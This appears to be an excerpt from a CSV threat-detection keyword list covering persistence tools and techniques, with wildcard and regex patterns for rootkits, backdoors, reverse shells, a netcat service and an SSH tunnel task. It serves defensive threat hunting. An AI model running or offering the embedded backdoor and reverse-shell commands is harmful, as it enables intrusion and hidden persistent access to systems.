"*RemoteHashRetrieval.ps1*",".{0,1000}RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Remove-KeeThiefLurker *",".{0,1000}Remove\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*Remove-TemplateLurker -EventName *",".{0,1000}Remove\-TemplateLurker\s\-EventName\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*RIDHIJACK.ps1*",".{0,1000}RIDHIJACK\.ps1.{0,1000}","offensive_tool_keyword","RID-Hijacking","RID Hijacking Proof of Concept script by Kevin Joyce","T1174","TA0003","N/A","N/A","Persistence","https://github.com/STEALTHbits/RIDHijackingProofofConceptKJ","1","1","N/A","N/A","9","1","15","7","2018-10-30T15:00:03Z","2018-10-29T19:52:10Z"
"*rmmod diamorphine*",".{0,1000}rmmod\sdiamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*Rootkit.cpp*",".{0,1000}Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*rootkiter.com/Termite*",".{0,1000}rootkiter\.com\/Termite.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*rootkiter/Termite*",".{0,1000}rootkiter\/Termite.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*rootkiter@rootkiter.com*",".{0,1000}rootkiter\@rootkiter\.com.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#email","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*rtcrowley/Offensive-Netsh-Helper*",".{0,1000}rtcrowley\/Offensive\-Netsh\-Helper.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*ruler --insecure *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*ruler-linux64*",".{0,1000}ruler\-linux64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*ruler-linux86*",".{0,1000}ruler\-linux86.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*ruler-osx64*",".{0,1000}ruler\-osx64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*ruler-win64.exe*",".{0,1000}ruler\-win64\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*ruler-win86.exe*",".{0,1000}ruler\-win86\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*run mount-cgroup ""sh -i * /dev/tcp/*",".{0,1000}run\smount\-cgroup\s\""sh\s\-i\s.{0,1000}\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*sc create *cmd /c regsvr32.exe /s *\desktop.ini*",".{0,1000}sc\screate\s.{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\s.{0,1000}\\desktop\.ini.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*sc create *nc.exe -*cmd.exe*",".{0,1000}sc\screate\s.{0,1000}nc\.exe\s\-.{0,1000}cmd\.exe.{0,1000}","greyware_tool_keyword","sc","create service with netcat","T1569.002 - T1059.003 - T1021.006","TA0004 - TA0002 - TA0011","N/A","Snatch","Persistence","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*sc create dellserv binPath=C:\dbutil_2_3.sys type=kernel*",".{0,1000}sc\screate\sdellserv\sbinPath\=C\:\\dbutil_2_3\.sys\stype\=kernel.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#servicename","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*sc sdset scmanager D:(A;;KA;;;WD)*",".{0,1000}sc\ssdset\sscmanager\sD\:\(A\;\;KA\;\;\;WD\).{0,1000}","greyware_tool_keyword","sc","creates a backdoor by weakening the security of the Service Control Manager allowing any user to manage services on the machine which can lead to privilege escalation and persistent access by an attacker","T1560.003 - T1562.001 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://x.com/0gtweet/status/1628720819537936386","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc.exe sdset scmanager D:(A;;KA;;;WD)*",".{0,1000}sc\.exe\ssdset\sscmanager\sD\:\(A\;\;KA\;\;\;WD\).{0,1000}","greyware_tool_keyword","sc","creates a backdoor by weakening the security of the Service Control Manager allowing any user to manage services on the machine which can lead to privilege escalation and persistent access by an attacker","T1560.003 - T1562.001 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://x.com/0gtweet/status/1628720819537936386","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc.exe*sdset scmanager D:(A;;KA;;;WD)*",".{0,1000}sc\.exe.{0,1000}sdset\sscmanager\sD\:\(A\;\;KA\;\;\;WD\).{0,1000}","greyware_tool_keyword","sc","creates a backdoor by weakening the security of the Service Control Manager allowing any user to manage services on the machine which can lead to privilege escalation and persistent access by an attacker","T1560.003 - T1562.001 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://x.com/0gtweet/status/1628720819537936386","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScheduleRunner.csproj*",".{0,1000}ScheduleRunner\.csproj.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*ScheduleRunner.exe*",".{0,1000}ScheduleRunner\.exe.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*ScheduleRunner.sln*",".{0,1000}ScheduleRunner\.sln.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*SchTask.exe C:\Windows\System32\cmd.exe *",".{0,1000}SchTask\.exe\sC\:\\Windows\\System32\\cmd\.exe\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*SchTask_0x727/releases*",".{0,1000}SchTask_0x727\/releases.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*SchTaskBackdoor.*",".{0,1000}SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*schtasks /Create /RU SYSTEM /XML c:\temp\*",".{0,1000}schtasks\s\/Create\s\/RU\sSYSTEM\s\/XML\sc\:\\temp\\.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks.exe /create /sc * /tr ""%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config\keys\id_rsa -N -R * -o StrictHostKeyChecking=no -o *",".{0,1000}schtasks\.exe\s\/create\s\/sc\s.{0,1000}\s\/tr\s\""\%programdata\%\\sshd\\sshd\.exe\s\-f\s\%programdata\%\\sshd\\config\\sshd_config\\keys\\id_rsa\s\-N\s\-R\s.{0,1000}\s\-o\sStrictHostKeyChecking\=no\s\-o\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks.exe /create /sc minute /mo 1 /tn * /rl highest /np /tr *\sshd\sshd.exe -f *\sshd\config\sshd_config*",".{0,1000}schtasks\.exe\s\/create\s\/sc\sminute\s\/mo\s1\s\/tn\s.{0,1000}\s\/rl\shighest\s\/np\s\/tr\s.{0,1000}\\sshd\\sshd\.exe\s\-f\s.{0,1000}\\sshd\\config\\sshd_config.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Seatbelt* -group=all*",".{0,1000}Seatbelt.{0,1000}\s\-group\=all.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*SeatbeltNet*.exe*",".{0,1000}SeatbeltNet.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*sensepost/ruler*",".{0,1000}sensepost\/ruler.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*setup_backdoor_user*",".{0,1000}setup_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_cap_backdoor*",".{0,1000}setup_cap_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_generator_persistence*",".{0,1000}setup_generator_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_git_persistence*",".{0,1000}setup_git_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_initd_backdoor*",".{0,1000}setup_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_malicious_docker_container*",".{0,1000}setup_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_malicious_package*",".{0,1000}setup_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_motd_backdoor*",".{0,1000}setup_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_rc_local_backdoor*",".{0,1000}setup_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_sudoers_backdoor*",".{0,1000}setup_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_suid_backdoor*",".{0,1000}setup_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*setup_system_binary_backdoor*",".{0,1000}setup_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*Set-WMIBackdoor -URL *",".{0,1000}Set\-WMIBackdoor\s\-URL\s.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","10","4","316","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z"
"*sh -i >& /dev/tcp/*/1337 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/1337\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*SharPersist -*",".{0,1000}SharPersist\s\-.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*SharPersist*",".{0,1000}SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*SharpEventLoader.exe*",".{0,1000}SharpEventLoader\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*SharpEventPersist.exe*",".{0,1000}SharpEventPersist\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
